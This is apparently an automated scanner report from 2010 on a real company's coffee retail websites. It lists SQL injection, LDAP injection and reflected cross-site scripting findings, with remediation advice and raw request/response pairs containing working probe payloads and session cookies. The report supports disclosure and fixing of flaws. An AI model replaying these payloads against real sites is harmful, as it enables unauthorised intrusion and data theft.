SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-reserve-coffee
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 62476475'%20or%201%3d1--%20 and 62476475'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /coffee/starbucks-reserve-coffee?162476475'%20or%201%3d1--%20=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:57:35 GMT Connection: close Content-Length: 52660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <a href="/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi" title="Aged Sulawesi Kalosi"> <img src="http://assets.starbucks.com/assets/aa98bb468e8e4d11bcf9c7c5c337e4fd.jpg" alt="Aged Sulawesi Kalosi Stamp Art" /> <br /><strong><span>Aged Sulawesi Kalosi</span></strong> <br /><span class="family">Starbucks Reserve... Coffee </span> <br /><span class="intensity"></span> </a> </li>
<li class="specialty_roast"> <a href="/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry" title="Brazil Sul de Minas Peaberry"> <img src="http://assets.starbucks.com/assets/84a1915283354bf5af4293a62a6b3175.jpg" alt="Brazil Sul de Minas Peaberry Stamp Art" /> <br /><strong><span>Brazil Sul de Minas Peaberry</span></strong> <br /><span class="family">Starbucks Reserve... Coffee </span> <br /><span class="intensity"></span> </a> </li>
1.2. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.starbucks.com
Path:
/coffee/via/instant-coffee
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13312046'%20or%201%3d1--%20 and 13312046'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /coffee/via/instant-coffee?113312046'%20or%201%3d1--%20=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:57:02 GMT Connection: close Content-Length: 53520
<li class="specialty_roast"> <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast"> <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Dec ...[SNIP]...
Request 2
GET /coffee/via/instant-coffee?113312046'%20or%201%3d2--%20=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 2
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:57:02 GMT Connection: close Content-Length: 53065
<li class="specialty_roast"> <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast"> <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Decaf Italian Roast" /> <br /><strong><span>Decaf Italian Roast</span></strong> <br /><span class="family">Starbucks VIA.. Coffees</span> <br /><span class="intensity"></span> </a> </li>
</ol> </div>
<div class="section" id="posts">
<div id="blog-602" class="blog-entry"> <h2><a href="/blog/Perfect-your-Starbucks-VIA-Ready-Brew-Flavored-experience">Perfect Your Starbucks VI ...[SNIP]...
The SITESERVER cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SITESERVER cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C'; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:25 GMT Connection: close Content-Length: 75
The page cannot be displayed because an internal server error has occurred.
Request 2
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C''; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 2
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 168 Content-Type: text/html Location: /coffee/?CCAID=SBPTPAHP1SHCO&Redir=/coffee/ Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:26 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/coffee/?CCAID=SBPTPAHP1SHCO&Redir=/coffee/">here</a>.</body>
2. LDAP injectionpreviousnext There are 3 instances of this issue:
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.
The payloads b04135e4d2d6b331)(sn=* and b04135e4d2d6b331)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET / HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21174 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:30 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="Find every Starbucks Coffee at the Official Online Store."> <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
<script src="/include/LibJavaScript.js" type="text/javascript"></script> <title> Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store </title>
GET / HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 2
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21174 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDACABBACA=HOJMDLCBHPPELAMPENAAECCJ; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:30 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="Find every Starbucks Coffee at the Official Online Store."> <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
<script src="/include/LibJavaScript.js" type="text/javascript"></script> <title> Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store </title>
The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.
The payloads 1a18fdd9ce30786c)(sn=* and 1a18fdd9ce30786c)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 351 Content-Type: text/html Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDACABBACA=HCKMDLCBEBEEIOJHOPIJIEII; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:39 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE">here</a>.</body>
Request 2
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 2
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 351 Content-Type: text/html Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:39 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE">here</a>.</body>
The ASPSESSIONIDCCDDADAA cookie appears to be vulnerable to LDAP injection attacks.
The payloads c20c2704323c6dbe)(sn=* and c20c2704323c6dbe)!(sn=* were each submitted in the ASPSESSIONIDCCDDADAA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=c20c2704323c6dbe)(sn=*; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21102 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCCDDADAA=GJHKDLCBKFNCFHEOPBDCFKDD; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:35 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="Shop for Coffee Machines, Espresso Machines and more at Starbucks Store"> <meta name="keywords" content="coffee machines, espresso machines">
<script src="/include/LibJavaScript.js" type="text/javascript"></script> <title>Coffee Machines at Starbucks Store</title>
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 69adb%20style%3dx%3aexpression(alert(1))%2021e0c039cae was submitted in the 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter. This input was echoed as 69adb style=x:expression(alert(1)) 21e0c039cae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:27:17 GMT Content-Length: 41391
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <param name="flashvars" value="playerType=homepage&playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=169adb style=x:expression(alert(1)) 21e0c039cae" /> ...[SNIP]...
3.2. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af12"style="x:expression(alert(1))"9f35c014f5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1 HTTP/1.1 Host: www.starbucks.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <param name="flashvars" value="playerType=homepage&playlistID=69777476001&playerLocation=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=1" /> ...[SNIP]...
3.3. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6ed"style%3d"x%3aexpression(alert(1))"7948577bab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb6ed"style="x:expression(alert(1))"7948577bab3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:25 GMT Content-Length: 56826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee?eb6ed"style="x:expression(alert(1))"7948577bab3=1"/> ...[SNIP]...
3.4. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/learn
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17abe"style="x:expression(alert(1))"ea84b9a66b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/learn?17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:00:23 GMT Connection: close Content-Length: 37678
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn?17abe"style="x:expression(alert(1))"ea84b9a66b2=1"/> ...[SNIP]...
3.5. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/learn/clover
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20ec4"style="x:expression(alert(1))"ceb4d722147 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
